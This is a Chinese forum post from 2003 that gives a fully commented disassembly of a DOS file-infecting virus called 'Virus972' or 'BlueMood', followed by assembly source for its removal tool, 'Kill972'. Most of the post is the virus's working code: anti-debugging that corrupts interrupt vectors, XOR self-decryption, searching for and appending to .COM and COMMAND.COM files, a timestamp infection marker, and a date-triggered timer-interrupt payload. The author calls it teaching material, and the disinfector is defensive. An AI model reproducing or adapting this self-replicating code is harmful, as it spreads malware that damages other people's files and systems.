| [这个贴子最后由ChinaFOX在 2003/10/09 08:24pm 第 2 次编辑]
以下说明:
1 该病毒只为教学用,任何人用该病毒所用的事与本人无关。
2 该病毒为DOS下的。
3 该病毒只不驻留内存。
4 该病毒值得看的地方是反跟踪技术和加密技术。
5 只感染EXE和Command.com文件,且只感染当前目录下第一个未感染的EXE文件,所以大家不用怕。
6 如果当前目录下没有未感染的EXE文件,就感染c:\Command.com文件。
7 后附杀毒程序。
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Virus972 By IG, ChinaFOX;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
4962:0100 E97102 JMP 0374
4962:033B 42 6C 75 65 4D 6F 6F 64 5B 48 61 72 6D 6C 65 73 73 5D ;病毒的开始
;'BlueMood[Harmless]'
4962:034D 03 93 9D 95 4D 97 7C 73 BD ....M.|s.
4962:0356 28 63 (c
4962:0358 29 47 65 6E 69 75 73 26 49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:0368 4E 55 2E 58 69 6E 58 69 61 6E 67 2E NU.XinXiang.
4962:0374 9C PUSHF ;病毒程序入口(开始处在33B)
4962:0375 51 PUSH CX ;本文件的长度
4962:0376 FA CLI ;禁止中断
4962:0377 E80000 CALL 037A
4962:037A 5B POP BX ;BX=IP=037A
4962:037B 81C34203 ADD BX,0342 ;?可能此后为缓冲区BX=6BC
4962:037F 8BF3 MOV SI,BX
4962:0381 81EE8103 SUB SI,0381 ;SI=33B指向病毒开始
4962:0385 BFDC00 MOV DI,00DC
4962:0388 90 NOP
4962:0389 03FB ADD DI,BX ;DI=798移动到病毒体以后
4962:038B B9CC03 MOV CX,03CC ;病毒长度(03CCh=972)
4962:038E 90 NOP
4962:038F FC CLD
4962:0390 F3 REPZ
4962:0391 A4 MOVSB ;移动自身到病毒体以后798处
4962:0392 8EDA MOV DS,DX ;DS=0 DI=B64
4962:0394 45 INC BP
4962:0395 83C26C ADD DX,+6C
4962:0398 B10A MOV CL,0A
4962:039A D3E5 SHL BP,CL ;BP=400 读取BIOS区数据
4962:039C FEC9 DEC CL ;CL=9
4962:039E EB21 JMP 03C1
4962:03A0 90EB
4962:03A2 8BF5 MOV SI,BP ;SI=4 DS=0(From 3CB)
4962:03A4 AD LODSW ;AX=DS:[SI]=0000:0004
4962:03A5 3104 XOR [SI],AX ;破坏单步中断
4962:03A7 EB25 JMP 03CE
4962:03A9 90EB
4926:03AB 8BC3 MOV AX,BX ;BX=06BC(From 3D6)
4926:03AD 50 PUSH AX ;缓冲区首址入栈
4926:03AE 8BEC MOV BP,SP ;SP=FFF8
4926:03B0 8BF3 MOV SI,BX
4926:03B2 81EEE202 SUB SI,02E2 ;SI=3DA
4926:03B6 06 PUSH ES
4926:03B7 1F POP DS ;DS=ES=0000
4926:03B8 8BFE MOV DI,SI ;SI=DI=3DA
4926:03BA B99CA7 MOV CX,A79C
4926:03BD EB37 JMP 03F6 ;进入逆指流解码区
4926:03BF 90EB
4962:03C1 8BFA MOV DI,DX ;DI=6C (From 39E)
4962:03C3 03FD ADD DI,BP ;DI=46C
4962:03C5 FEC9 DEC CL ;CL=8
4962:03C7 D3ED SHR BP,CL ;BP=4
4962:03C9 8B0D MOV CX,[DI] ;(0000:046C)CX=随机数
4962:03CB EBD5 JMP 03A2
4962:03CD EB
4962:03CE 83C606 ADD SI,+06 ;SI=0C (From 3A7)
4962:03D1 AD LODSW ;SI=0E
4962:03D2 3104 XOR [SI],AX ;破坏INT 3H中断向量
4962:03D4 330D XOR CX,[DI] ;随机数与随机数异或
4962:03D6 74D3 JZ 03AB
4962:03D8 EBE7 JMP 03C1
4962:03DA C342E2FAC1AAAC328BFEB90281EE8BF3 ;42--2
4962:03EA 0390B9000251E9B900818B4E ;用于逆指令流的数据
4926:03F6 AD LODSW ;15次后变成JMP 0400(From 3BD)
4926:03F7 50 PUSH AX
AX=08EB BX=06BC CX=A79C DX=006C SP=FFDA BP=FFF8 SI=03F8 DI=03F8
DS=4962 ES=4962 SS=4962 CS=4962 IP=03F6 NV UP EI PL NZ NA PE NC
4962:03F6 EB08 JMP 0400 ;08EB=50AD xor A79C xor FFDA
4926:03F8 33C1 XOR AX,CX ;CX=A79C
4926:03FA 33C4 XOR AX,SP
4926:03FC AB STOSW ;DI=2DA
4926:03FD EBF7 JMP 03F6 ;循环
4926:03FF EB
4962:0400 58 POP AX
4962:0401 FFE4 JMP SP ;SP=FFDC
AX=50AD BX=06BC CX=A79C DX=006C SP=FFDC BP=FFF8 SI=03F8 DI=03F8
DS=4962 ES=4962 SS=4962 CS=4962 IP=FFDC NV UP EI PL NZ NA PE NC
4962:FFDC 8B4E00 MOV CX,[BP+00] ;SS:FFF8=06BC
4962:FFDF 81E9B902 SUB CX,02B9
4962:FFE3 51 PUSH CX ;CX=403
4962:FFE4 B90003 MOV CX,0300 ;CX=768
4962:FFE7 90 NOP
4962:FFE8 8BF3 MOV SI,BX
4962:FFEA 81EEB902 SUB SI,02B9 ;SI=403H
4962:FFEE 8BFE MOV DI,SI ;对DS:0403-0703进行解密
4962:FFF0 AC LODSB
4962:FFF1 32C1 XOR AL,CL
4962:FFF3 AA STOSB
4962:FFF4 E2FA LOOP FFF0 ;解密源跳点之后的程序
AX=5044 BX=06BC CX=0000 DX=006C SP=FFDA BP=FFF8 SI=0703 DI=0703
DS=4962 ES=4962 SS=4962 CS=4962 IP=FFF6 NV UP EI PL NZ NA PE NC
4962:FFF6 C3 RET ;[SS]=4926 [SP]=0403 跳回源点
AX=5044 BX=06BC CX=0000 DX=006C SP=FFDC BP=FFF8 SI=0703 DI=0703
DS=4962 ES=4962 SS=4962 CS=4962 IP=0403 NV UP EI PL NZ NA PE NC
4962:0403 8BE5 MOV SP,BP
4962:0405 58 POP AX ;SS:BP处存着关键字AX=6BC
4962:0406 BF0001 MOV DI,0100
4962:0409 8A874700 MOV AL,[BX+0047] ;[BX+0047]=[0703]=7C
4962:040D 347C XOR AL,7C
4962:040F 3005 XOR [DI],AL ;[100]=E9
4962:0411 47 INC DI ;DI=101
4962:0412 8B874800 MOV AX,[BX+0048] ;[704]=D81B
4962:0416 357619 XOR AX,1976
4962:0419 3105 XOR [DI],AX ;恢复文件头的JMP XXXX
4962:041B 33C0 XOR AX,AX
4962:041D 8ED8 MOV DS,AX
4962:041F BE0400 MOV SI,0004
4962:0422 AD LODSW ;读INT 1H之IP
4962:0423 3104 XOR [SI],AX ;再次破坏INT 1H
4962:0425 BE0C00 MOV SI,000C
4962:0428 AD LODSW
4962:0429 3104 XOR [SI],AX ;破坏INT 3H
4962:042B 06 PUSH ES
4962:042C 1F POP DS ;DS=4962
4962:042D B93900 MOV CX,0039 ;57个字节
4962:0430 90 NOP
4962:0431 8BF3 MOV SI,BX ;BX=6BC
4962:0433 2BF1 SUB SI,CX ;SI=683
4962:0435 BFDC00 MOV DI,00DC
4962:0438 90 NOP
4962:0439 03FB ADD DI,BX ;DI=798
4962:043B F3 REPZ
4962:043C A4 MOVSB ;移动"Blu...xiang.."
4962:043D 8BF3 MOV SI,BX ;SI=6BC
4962:043F B430 MOV AH,30 ;取DOS版本号
4962:0441 CD21 INT 21
4962:0443 3C02 CMP AL,02
4962:0445 7703 JA 044A ;大于DOS2.0
4962:0447 E91602 JMP 0660 ;可能是退出
4962:044A B42F MOV AH,2F ;取磁盘缓冲区首址
4962:044C CD21 INT 21
4962:044E 899C4F00 MOV [SI+004F],BX ;[SI+004F]=[70B]
4962:0452 8C845100 MOV [SI+0051],ES ;保存地址[70D]
4962:0456 8BDE MOV BX,SI ;BX=6BC
4962:0458 BA9D00 MOV DX,009D
4962:045B 90 NOP
4962:045C 03D3 ADD DX,BX ;DX=759
4962:045E B41A MOV AH,1A ;设置DAT地址(在DS:DX)
4962:0460 CD21 INT 21 ;说明:程序开始时在PSP:0080处
4962:0462 83C634 ADD SI,+34
4962:0465 90 NOP
4962:0466 56 PUSH SI ;SI=6F0
4962:002C 52 49 43 3E RIC>
4962:0467 8E062C00 MOV ES,[002C] ;DS:[002C]=4952 环境块段址
4962:046B 33FF XOR DI,DI
4962:046D B98000 MOV CX,0080
4962:0470 5E POP SI ;SI=6F0
4962:0471 56 PUSH SI
4962:0472 AC LODSB
4962:0473 F2 REPNZ
4962:0474 AE SCASB ;是否'PATH=*.COM'
4962:0475 51 PUSH CX ;长度
4962:0476 B90400 MOV CX,0004
4962:0479 F3 REPZ
4962:047A A6 CMPSB ;环境块中有无'*.COM'
4962:047B E307 JCXZ 0484 ;有
4962:047D 59 POP CX ;长度
4962:047E E2F0 LOOP 0470 ;比较下一个串
4962:0480 5E POP SI ;6F0
4962:0481 E9DC01 JMP 0660 ;恢复并转向正常程序执行
4962:0484 59 POP CX ;有
4962:0485 5E POP SI ;?SI=6F0
4962:0486 89BF4D00 MOV [BX+004D],DI ;[6BC+4D]=[709]保存环境块长度
4962:048A BF5900 MOV DI,0059
4962:048D 90 NOP
4962:048E 03FB ADD DI,BX ;DI=715
4962:0490 89BF9900 MOV [BX+0099],DI ;[755]
4962:0494 EB33 JMP 04C9
4962:0496 83BC4D0000 CMP WORD PTR [SI+004D],+00 ;[742](From 4F0)
4962:049B 7503 JNZ 04A0
4962:049D E96701 JMP 0607
4962:04A0 8BBF9900 MOV DI,[BX+0099] ;[755]
4962:04A4 8BB74D00 MOV SI,[BX+004D] ;[709]
4962:002C 52 49 43 3E RIC>
4962:04A8 8E1E2C00 MOV DS,[002C] ;DS=4952;
4962:04AC AC LODSB
4962:04AD 3C3B CMP AL,3B ;';' ?':'
4962:04AF 7409 JZ 04BA ;?换驱
4962:04B1 3C00 CMP AL,00
4962:04B3 7403 JZ 04B8 ;?结束
4962:04B5 AA STOSB
4962:04B6 EBF4 JMP 04AC
4962:04B8 33F6 XOR SI,SI ;AL=0
4962:04BA 06 PUSH ES
4962:04BB 1F POP DS
4962:04BC 89B74D00 MOV [BX+004D],SI ;[709]
4962:04C0 807DFF5C CMP BYTE PTR [DI-01],5C ;'\'
4962:04C4 7403 JZ 04C9
4962:04C6 B05C MOV AL,5C
4962:04C8 AA STOSB
4962:04C9 89BF9B00 MOV [BX+009B],DI ;[757]=715(Jmp From 494)
4962:04CD 8BF3 MOV SI,BX
4962:04CF 83C639 ADD SI,+39 ;SI=6BC+39=6F5
4962:04D2 90 NOP
4962:04D3 1E PUSH DS
4962:04D4 07 POP ES
4962:04D5 B90600 MOV CX,0006 ;'*.COM',0
4962:04D8 F3 REPZ ;DI=715
4962:04D9 A4 MOVSB ;传送"*.COM",0
4962:04DA 8BF3 MOV SI,BX ;SI=6BC
4962:04DC B44E MOV AH,4E ;查找第一个匹配文件
4962:04DE 8B979900 MOV DX,[BX+0099] ;DS:DX(=755)为ASCZ串
4962:04E2 B90300 MOV CX,0003 ;属性:隐藏并只读
4962:04E5 CD21 INT 21
4962:04E7 EB05 JMP 04EE
4962:04E9 90 NOP
4962:04EA B44F MOV AH,4F ;查找下一个匹配文件
4962:04EC CD21 INT 21
4962:04EE 7302 JNB 04F2 ;若有错(From 4E7)
4962:04F0 EBA4 JMP 0496 ;
4962:04F2 8B87B300 MOV AX,[BX+00B3] ;打开有错[7F6](From 4EE)
4962:04F6 241E AND AL,1E ;
4962:04F8 3C1E CMP AL,1E
4962:04FA 74EE JZ 04EA ;如果不符合
4962:04FC 83BFB7000D CMP WORD PTR [BX+00B7],+0D ;[773]
4962:0501 72E7 JB 04EA
4962:0503 81BFB70000F0 CMP WORD PTR [BX+00B7],F000 ;[773]
4962:0509 77DF JA 04EA
4962:050B BE4000 MOV SI,0040
4962:050E 90 NOP
4962:050F 03F3 ADD SI,BX ;SI=6FC
4962:0511 BFBB00 MOV DI,00BB
4962:0514 90 NOP
4962:0515 03FB ADD DI,BX ;DI=777
4962:0517 B90700 MOV CX,0007
4962:051A F3 REPZ
4962:051B A6 CMPSB ;传送'COMMAND'
4962:051C 0BC9 OR CX,CX
4962:051E 74CA JZ 04EA ;查找下一个文件
4962:0520 8BF3 MOV SI,BX
4962:0522 B82435 MOV AX,3524 ;取INT 24H中断向量
4962:0525 CD21 INT 21
4962:0527 06 PUSH ES
4962:0528 53 PUSH BX ;保存入栈
4962:0529 8BDE MOV BX,SI
4962:052B 1E PUSH DS
4962:052C 07 POP ES
4962:052D BA3100 MOV DX,0031
4962:0530 03D3 ADD DX,BX ;DS:DX=4962:06ED
4962:0532 B82425 MOV AX,2524 ;设置INT 24H中断向量
4962:0535 CD21 INT 21 ;其内容是使AL=0
4962:0537 8BBF9B00 MOV DI,[BX+009B] ;[757]
4962:053B 81C6BB00 ADD SI,00BB ;SI=6BC+BB=777
4962:053F AC LODSB
4962:0540 AA STOSB
4962:0541 3C00 CMP AL,00
4962:0543 75FA JNZ 053F
4962:0545 B80043 MOV AX,4300 ;CX:0只读1隐藏2系统3卷标4目录
4962:0548 8B979900 MOV DX,[BX+0099] ;ASCZ<==[755]
4962:054C CD21 INT 21 ;取得文件属性
4962:054E 898F5700 MOV [BX+0057],CX ;[713]保存文件属性
4962:0552 B80143 MOV AX,4301 ;DS:DX为ASCZ串
4962:0555 B92000 MOV CX,0020 ;?保留 ?作标记
4962:0558 CD21 INT 21 ;设置文件属性
4962:055A B8023D MOV AX,3D02 ;以读写方式打开
4962:055D CD21 INT 21
4962:055F 7303 JNB 0564 ;成功
4962:0561 E98D00 JMP 05F1 ;失败则恢复属性及运行显示部分
4962:0564 8BF3 MOV SI,BX ;
4962:0566 8BD8 MOV BX,AX ;文件代号
4962:0568 B80057 MOV AX,5700 ;取得文件日期和时间
4962:056B CD21 INT 21 ;BX:句柄CX:时间DX:日期
4962:056D 898C5300 MOV [SI+0053],CX ;[70F]
4962:0571 89945500 MOV [SI+0055],DX ;[711]
4962:0575 B43F MOV AH,3F ;从文件中读取
4962:0577 B90300 MOV CX,0003
4962:057A BAA404 MOV DX,04A4 ;DS:DX缓冲区
4962:057D 90 NOP
4962:057E 03D6 ADD DX,SI ;?DX=6BC+4A4=B60
4962:0580 CD21 INT 21 ;BX:句柄
4962:0582 7256 JB 05DA ;失败则恢复时间日期并关闭
4962:0584 3D0300 CMP AX,0003
4962:0587 7551 JNZ 05DA ;若没读成功(或长度小于3Byte)
4962:0589 33C9 XOR CX,CX
4962:058B 33D2 XOR DX,DX
4962:058D B80242 MOV AX,4202 ;将文件指针移到文件未尾
4962:0590 CD21 INT 21
4962:0592 7246 JB 05DA ;失败
4962:0594 8BC8 MOV CX,AX ;保存文件长度
4962:0596 053600 ADD AX,0036 ;AX指向病毒入口(前36为Blue...)
4962:0599 89844B00 MOV [SI+004B],AX ;[708]
4962:059D 56 PUSH SI ;SI=6BC
4962:059E 81C6A504 ADD SI,04A5 ;
4962:05A2 357619 XOR AX,1976
4962:05A5 3104 XOR [SI],AX
4962:05A7 4E DEC SI
4962:05A8 803495 XOR BYTE PTR [SI],95
4962:05AB 5E POP SI
4962:05AC B9CC03 MOV CX,03CC ;972
4962:05AF 90 NOP
4962:05B0 BADC00 MOV DX,00DC
4962:05B3 90 NOP
4962:05B4 03D6 ADD DX,SI ;DS:DX:缓冲区
4962:05B6 B440 MOV AH,40 ;写文件
4962:05B8 CD21 INT 21
4962:05BA 721E JB 05DA ;关闭退出
4962:05BC 3DCC03 CMP AX,03CC
4962:05BF 90 NOP
4962:05C0 7518 JNZ 05DA ;是否写了972Byte
4962:05C2 33C9 XOR CX,CX
4962:05C4 33D2 XOR DX,DX
4962:05C6 B80042 MOV AX,4200 ;指针移到文件开始处
4962:05C9 CD21 INT 21
4962:05CB 720D JB 05DA ;不成功
4962:05CD B90300 MOV CX,0003 ;字节数
4962:05D0 BA4A00 MOV DX,004A
4962:05D3 90 NOP
4962:05D4 03D6 ADD DX,SI ;DS:DX缓冲区
4962:05D6 B440 MOV AH,40 ;写文件 JMP XXXX
4962:05D8 CD21 INT 21
4962:05DA 8B8C5300 MOV CX,[SI+0053] ;旧时间
4962:05DE 8B945500 MOV DX,[SI+0055] ;旧日期
4962:05E2 83C91E OR CX,+1E
4962:05E5 83E1FE AND CX,-02 ;CX:新时间==>感染标志
4962:05E8 B80157 MOV AX,5701 ;设置文件日期和时间
4962:05EB CD21 INT 21
4962:05ED B43E MOV AH,3E ;关闭文件
4962:05EF CD21 INT 21
4962:05F1 8B8C5700 MOV CX,[SI+0057] ;恢复原属性[713]
4962:05F5 8B949900 MOV DX,[SI+0099] ;DS:DX(=755)为ASCZ串
4962:05F9 B80143 MOV AX,4301 ;恢复文件属性
4962:05FC CD21 INT 21
4962:05FE 5A POP DX
4962:05FF 1F POP DS
4962:0600 B82425 MOV AX,2524 ;恢复INT 24H中断向量
4962:0603 CD21 INT 21
4962:0605 06 PUSH ES
4962:0606 1F POP DS
4962:0607 8B944F00 MOV DX,[SI+004F] ;[70B](From49D)
4962:060B 8E9C5100 MOV DS,[SI+0051] ;DS:DX(=70D)为DAT地址
4962:060F B41A MOV AH,1A ;恢复磁盘传输DAT地址
4962:0611 CD21 INT 21
4962:0613 06 PUSH ES
4962:0614 1F POP DS
4962:0615 B42A MOV AH,2A ;取得系统日期
4962:0617 CD21 INT 21 ;CX:年
4962:0619 80FE04 CMP DH,04 ;DH:4月
4962:061C 7217 JB 0635
4962:061E 7705 JA 0625
4962:0620 80FA0D CMP DL,0D ;DL:13日
4962:0623 7210 JB 0635
4962:0625 80FE07 CMP DH,07 ;7月
4962:0628 770B JA 0635
4962:062A 7205 JB 0631
4962:062C 80FA0C CMP DL,0C ;12月
4962:062F 7704 JA 0635
4962:0631 3C05 CMP AL,05 ;AL:星期五(DOS1,10+)
4962:0633 7404 JA 0639
4962:0635 3C06 CMP AL,06 ;星期六
4962:0637 7527 JNZ 0660
4962:0639 B42C MOV AH,2C ;取得系统时间
4962:063B CD21 INT 21
4962:063D 81F90D10 CMP CX,100D ;CH:时 CL:分
4962:0641 721D JB 0660
4962:0643 8BDE MOV BX,SI
4962:0645 B81000 MOV AX,0010
4962:0648 8EC0 MOV ES,AX
4962:064A BF0301 MOV DI,0103
4962:064D B93100 MOV CX,0031 ;49个字节
4962:0650 F3 REPZ
4962:0651 A4 MOVSB ;移到0000:0203处
4962:0652 1E PUSH DS
4962:0653 07 POP ES
4962:0654 8ED8 MOV DS,AX ;DS=0010
4962:0656 BA0501 MOV DX,0105 ;DS:DX新中断
4962:0659 B81C25 MOV AX,251C ;设置INT ICH系统时钟中断
4962:065C CD21 INT 21 ;于0000:0205处(即INT 80H-9CH)
4962:065E 06 PUSH ES
4962:065F 1F POP DS
4962:0660 B92F03 MOV CX,032F ;815 ?退出
4962:0663 90 NOP
4962:0664 8BFB MOV DI,BX ;BX=6BC
4962:0666 81EF8103 SUB DI,0381 ;DI=33B SI=6BC
4962:066A F3 REPZ
4962:066B AA STOSB ;可能是自毁程序
4962:066C 33DB XOR BX,BX
4962:066E 33D2 XOR DX,DX
4962:0670 33F6 XOR SI,SI
4962:0672 33FF XOR DI,DI
4962:0674 33ED XOR BP,BP ;恢复原程序环境
4962:0676 59 POP CX ;CX=本文长度(程序开头之入栈)
4962:0677 81E9CC03 SUB CX,03CC ;CX=原文件长度23B
4962:067B 9D POPF ;(本文开始处之寄入栈)
4962:067C B80001 MOV AX,0100
4962:067F 50 PUSH AX
4962:0680 33C0 XOR AX,AX
4962:0682 C3 RET ;转向????:0100(转正常程序)
4962:0680 42 6C 75 65 4D-6F 6F 64 5B 48 61 72 6D BlueMood[Harm
4962:0690 6C 65 73 73 5D less]
4962:0695 03939D95 ADD DX,[BP+DI+959D]
4962:0699 4D DEC BP
4962:069A 97 XCHG DI,AX
4962:069B 7C73BD JL 0710
4962:0690 28 63 (c
4962:06A0 29 47 65 6E 69 75 73 26-49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:06B0 4E 55 2E 58 69 6E 58 69-61 6E 67 2E NU.XinXiang.
;可能此后为一缓冲区
4962:06BC D01A RCR BYTE PTR [BP+SI],1
4962:06BE 2E CS:
4962:06BF FF0E0301 DEC WORD PTR [0103]
4962:06C3 2E CS:
4962:06C4 833E030100 CMP WORD PTR [0103],+00
4962:06C9 7521 JNZ 06EC
4962:06CB 50 PUSH AX ;可能是新中断开始
4962:06CC 53 PUSH BX
4962:06CD 1E PUSH DS ;DS:DX文件控制块(FCB)首址
4962:06CE B40F MOV AH,0F ;用FCB打开文件
4962:06D0 CD10 INT 10
4962:06D2 3C03 CMP AL,03 ;?AL=0成功AL=FF不成功
4962:06D4 750C JNZ 06E2
4962:06D6 B800B8 MOV AX,B800
4962:06D9 8ED8 MOV DS,AX ;显示缓冲区首址
4962:06DB 33DB XOR BX,BX
4962:06DD B8031C MOV AX,1C03 ;蓝底褐字心形图案
4962:06E0 8907 MOV [BX],AX ;在屏幕左上角显示
4962:06E2 2E CS:
4962:06E3 C7060301D01A MOV WORD PTR [0103],1AD0 ;可能是传染标志
4962:06E9 1F POP DS
4962:06EA 5B POP BX
4962:06EB 58 POP AX
4962:06EC CF IRET ;新中断结束
4962:06ED 32C0 XOR AL,AL ;新INT 24H中断
4962:06EF CF IRET ;新中断结束
4962:06F0 50 41 54 48 3D ;'PATH='
4962:06F5 2A 2E 43 4F 4D 00 ;'*.COM',0 (ASCZ)
4962:06FB 00 43 4F 4D 4D ;0,'COMMAND'
4962:0703 7C ;数据(From 4962:0409):原文件头jmp xxxx
4962:0704 D81B ;数据(From 4962:0412):注:此处已加密
4962:0706 E9 SBB BP,CX
4962:0707 F4 HLT
;屯屯屯屯屯屯屯屯屯屯屯屯统绦蚪崾屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯
4962:0708 74 ;长度+36 (From 599)
4962:0709 0780 ;环境块长度(From 486)
4962:070B 3E96 ;保存磁盘传输偏址处(From 44E)
4962:070D 0E00 ;保存磁盘传输段址处(From 452)
4962:070F 7401 ;文件时间
4962:0711 46FF ;文件日期
4962:0713 FF46 ;保存文件属性
4962:0714 F4 INC WORD PTR [BP-0C]
4962:0715 EB03895EF4E9 ;存'*.COM',0(From 4D8)
4962:071B 7F00 JMP 079C
4962:071D 895EF4 MOV [BP-0C],BX
4962:0720 85DB TEST BX,BX
4962:0722 7C46 JL 076A
4962:0724 89F2 MOV DX,SI
4962:0726 2B56F4 SUB DX,[BP-0C]
4962:0729 83FA01 CMP DX,+01
4962:072C 7E18 JLE 0746
4962:072E 8B46F4 MOV AX,[BP-0C]
4962:0731 40 INC AX
4962:0732 8B5E0E MOV BX,[BP+0E]
4962:0735 01C3 ADD BX,AX
4962:0737 1E PUSH DS
4962:0738 53 PUSH BX
4962:0739 8B5E0E MOV BX,[BP+0E]
4962:073C 035EF4 ADD BX,[BP-0C]
4962:073F 1E PUSH DS
4962:0740 53 PUSH BX
4962:0741 4A DEC DX
4962:0742 52 PUSH DX
4962:0743 E81E17 CALL 1E64
4962:0746 89F0 MOV AX,SI
4962:0748 2B46F4 SUB AX,[BP-0C]
4962:074B 85C0 TEST AX,AX
4962:074D 7E1B JLE 076A
4962:074F 4E DEC SI
4962:0750 EB18 JMP 076A
4962:0752 8B76F4 MOV SI,[BP-0C]
4962:0755 EB13 ;DI=715(From 490)另要查找的文件名串在此存(From 4DE)
4962:0757 31F6 ;保存DI=715(From 4C9)
;磁盘传输地址FCB结构(From 45E)
4962:0759 EB ;文件所在驱动器
4962:075A 07C746F40000EB3A ;文件名
4962:0762 8976F4 ;扩展名
4962:0765 EB35 ;文件当前块
4962:0767 E8CA ;文件当前长度
4962:0769 B0EB30C4 ;文件长度
4962:076D 1EAA ;文件日期
4962:076F 0726837F20007E2226C4 ;由系统设置
4962:0779 7F ;顺序读前设置
4962:070A 1C268B05 ;随机读前设置(存"COMMAND" From 51B)
4962:077E 26 ES:
4962:077F 8B5502 MOV DX,[DI+02]
4962:0782 83C00A ADD AX,+0A
4962:0785 52 PUSH DX
4962:0786 50 PUSH AX
4962:0787 8E06AC21 MOV ES,[21AC]
4962:078B 26 ES:
4962:078C C47F1C LES DI,[BX+1C]
4962:078F 26 ES:
4962:0790 C41D LES BX,[DI]
4962:0792 26 ES:
4962:0793 FF7708 PUSH [BX+08]
4962:0796 E8 5F
4962:0798 42 6C 75 65 4D-6F 6F 64 5B 48 61 72 6D BlueMood[Harm
4962:07A5 6C 65 73 73 5D 03 93 9D-95 4D 97 7C 73 BD 28 63 less]....M.|s.(c
4962:07B5 29 47 65 6E 69 75 73 26-49 64 69 6F 74 02 48 4E )Genius&Idiot.HN
4962:07C5 4E 55 2E 58 69 6E 58 69-61 6E 67 2E NU.XinXiang.
;(Move here From 43C)
4962:07D1 9C PUSHF
4962:07D2 51 PUSH CX
4962:07D3 90 NOP
4962:07D4 E80000 CALL 07D7
4962:07D7 5B POP BX
4962:0100 E9 71 02 00 ;数据(From 40F)
4962:002C 52 49 43 3E RIC>
;(From 467)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Kill972 By 286, ChinaFOX;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CODE SEGMENT
org 100h
assume cs:CODE,ds:CODE,es:CODE,ss:CODE
MAIN PROC NEAR
jmp begin
MSG0 db 'Please Input FileName:$'
FNAME db 50
db 0
db 50 dup (0)
MSG1 db 0dh,0ah,'No Virus in file!',0dh,0ah,'$'
MSG2 db 0dh,0ah,'Find Virus!',0dh,0ah,'$'
MSG3 db 0dh,0ah,'Kill Successfully!',0dh,0ah,'$'
ERROR db 0dh,0ah,'File Not Found!',0dh,0ah,'$'
HANDLE dw 0
NUMB1 dw 0 ;文件长度<>File Length
NUMB2 dw 0 ;原文件长<>OldFile Length
VirusLength dw 972
DISPSTR MACRO ADDR
lea dx,ADDR
mov ah,9
int 21h
ENDM
begin: DISPSTR MSG0 ;"请输入文件名:"<>"Input FileName"
mov ah,0ah ;键盘缓冲区输入<>Keyboard buffer input
lea dx,FNAME ;ds:dx=>缓冲区<>Buffer
int 21h
lea bx,FNAME+1
tail0: inc bx
cmp byte ptr [bx],0dh
jnz tail0
mov byte ptr [bx],0 ;生成ASCIIZ<> Creat ASCIIZ
mov ax,3d02h
lea dx,FNAME+2
int 21h ;Open with Read & Write
jc er ;"文件没有找到"<>"File not Found"
mov bx,ax
mov HANDLE,ax
mov ax,4202h ;Move Pointer to End of File
xor cx,cx
xor dx,dx
int 21h
cmp ax,VirusLength ;比病毒短:"没有感染"
jbe no1 ;<>Shorter Than virusLength:"No Virus"
mov NUMB1,ax ;实际字节数<>Byte Numbers in fact
sub ax,VirusLength
mov NUMB2,ax ;原文件长度<>OldFile Length
mov ax,4200h ;Move Pointer to head of File
xor cx,cx
xor dx,dx
int 21h
mov ah,3fh
mov cx,NUMB1
lea dx,Buffer
int 21h
mov ah,3eh
int 21h ;关闭<>Close file
lea di,Buffer
add di,NUMB1
dec di
cmp word ptr[di-971],6c42h
jnz no1
cmp word ptr[di-969],06575h
jnz no1
cmp byte ptr[di],0e9h ;病毒特征<>Staus of Virus
jnz no1
jmp v
er: jmp err
v: DISPSTR MSG2 ;发现病毒<>"Found Virus"
lea si,Buffer
mov ax,[di-2]
xor ax,1976h
xor [si+1],ax
mov al,[di-3]
xor al,7ch
xor [si],al
jmp mm
no1: jmp no
mm: lea dx,FNAME+2
mov ax,3c00h ;创建<>Creat
mov cx,0 ;属性<>Attribute
mov dx,offset FNAME+2 ;DS:DX=>ASCIIZ
int 21h
mov bx,ax
mov ah,40h ;写<>Write
mov cx,NUMB2 ;长度<>Length
lea dx,Buffer
int 21h
mov ah,3eh ;关闭<>Close
int 21h
DISPSTR MSG3 ;"成功杀掉"<>"Kill Successfully"
jmp exit
no: push cs
pop ds
DISPSTR MSG1 ;"没有感染"<>"Not be infected"
mov bx,HANDLE
mov ax,3e00h ;关闭<>Close
int 21h
jmp exit
err: DISPSTR ERROR ;"文件没有找到"<>"File not Found"
exit: mov ax,4c00h
int 21h
Buffer db 0
MAIN ENDP
CODE ENDS
END MAIN
|
